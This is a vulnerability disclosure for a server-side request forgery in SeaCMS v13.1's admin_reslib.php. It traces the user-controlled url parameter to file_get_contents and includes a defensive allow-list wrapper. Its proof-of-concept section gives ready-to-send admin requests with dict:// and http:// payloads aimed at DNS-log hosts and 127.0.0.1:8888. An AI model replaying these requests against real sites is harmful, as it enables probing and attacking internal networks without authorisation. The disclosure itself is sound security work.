SeaCMS v13.1 SSRF vulnerability
Summary
SeaCMS v13.1 contains an SSRF vulnerability in the "admin\admin_reslib.php" file. After gaining backend access, an attacker can exploit this vulnerability to trigger a Server-Side Request Forgery (SSRF).
Detail
admin_reslib.php
The cget function called on lines 75 and 77 is the entry point for the vulnerability. The first call passes the weburl parameter and isref; the second passes weburl and 0.
The isref variable is assigned the value 1 on line 38.
filter.inc.php
I discovered the following inclusion chain:
admin_reslib.php -> config.php -> common.php -> filter.inc.php
In lines 37-44 of filter.inc.php, the HTTP request parameters are assigned to variables of the same name, so the url value can be set from the HTTP request.
$url is then assigned to $var_url, which in turn is assigned to $weburl, so the weburl argument passed to cget is user-controlled.
common.file.func.php
Next, let's look at include\common.file.func.php, where the cget function is defined:
As mentioned earlier, two cget calls are made. The first sets $isref = 1, and the second sets $isref = 2. As a result, both getRemoteContent and get are executed.
In both functions the $url parameter is passed straight to file_get_contents, which is therefore the sink for this vulnerability.
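As an added example (not SeaCMS code; the function name is hypothetical), this is the kind of wrapper that would need to sit between cget and file_get_contents so that a user-controlled $weburl can only reach public web servers:

```php
<?php
// Added example: an allow-list wrapper for a remote fetch. Not part of
// SeaCMS; fetch_remote_safely() is a hypothetical name.

function fetch_remote_safely(string $url, int $timeout = 5): ?string
{
    $parts = parse_url($url);
    if ($parts === false || empty($parts['scheme']) || empty($parts['host'])) {
        return null;
    }
    // Only plain web schemes: this rejects dict://, file://, gopher://, php:// ...
    $scheme = strtolower($parts['scheme']);
    if (!in_array($scheme, ['http', 'https'], true)) {
        return null;
    }
    // Only the default web ports, so the request cannot be aimed at other services.
    $port = $parts['port'] ?? ($scheme === 'https' ? 443 : 80);
    if (!in_array($port, [80, 443], true)) {
        return null;
    }
    // Resolve the host (A and AAAA) and reject loopback, private and reserved ranges.
    $host = $parts['host'];
    if (filter_var($host, FILTER_VALIDATE_IP)) {
        $ips = [$host];
    } else {
        $records = dns_get_record($host, DNS_A | DNS_AAAA) ?: [];
        $ips = array_filter(array_map(fn($r) => $r['ip'] ?? $r['ipv6'] ?? null, $records));
    }
    if ($ips === []) {
        return null;
    }
    foreach ($ips as $ip) {
        $flags = FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE;
        if (filter_var($ip, FILTER_VALIDATE_IP, $flags) === false) {
            return null;
        }
    }
    // No redirects, so a public URL cannot bounce the request to an internal one.
    $ctx = stream_context_create([
        'http' => ['follow_location' => 0, 'timeout' => $timeout, 'ignore_errors' => true],
    ]);
    $body = @file_get_contents($url, false, $ctx);
    return $body === false ? null : $body;
}
```

Note the remaining gap: file_get_contents resolves the hostname again when it connects, so a DNS answer that changes between the check and the fetch is not covered; pinning the connection to the validated address needs a client that supports it (for example cURL's CURLOPT_RESOLVE) or an egress proxy.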
PoC
This vulnerability requires backend administrator privileges and the administrator's cookies to initiate the request.
Please note that the backend path is randomly generated during website setup, so each user will have a different path. During testing, use your specific path.
DNS Log
http://localdomain/dv87zx/admin_reslib.php?ac=list&rid=1&url=dict://12.64ju5d.dnslog.cn
GET /9d74yp/admin_reslib.php?ac=list&rid=1&url=http://test.cymyolkmms.yutu.eu.org HTTP/1.1
Host: localdomain
Cookie: t00ls=e54285de394c4207cd521213cebab040; t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MTA6InBocCB8IHBocD8iO3M6MzoiYWxsIjtpOjA7czozOiJodGEiO2k6MTt9; PHPSESSID=8aeha7cifr5gr58fcnvhr5ln10
127.0.0.1
GET /9d74yp/admin_reslib.php?ac=list&rid=1&url=dict://127.0.0.1:8888 HTTP/1.1
Host: localdomain
Cookie: t00ls=e54285de394c4207cd521213cebab040; t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MTA6InBocCB8IHBocD8iO3M6MzoiYWxsIjtpOjA7czozOiJodGEiO2k6MTt9; PHPSESSID=8aeha7cifr5gr58fcnvhr5ln10
Because file_get_contents accepts any registered stream wrapper, the dict:// protocol can be used to reach internal network addresses and ports.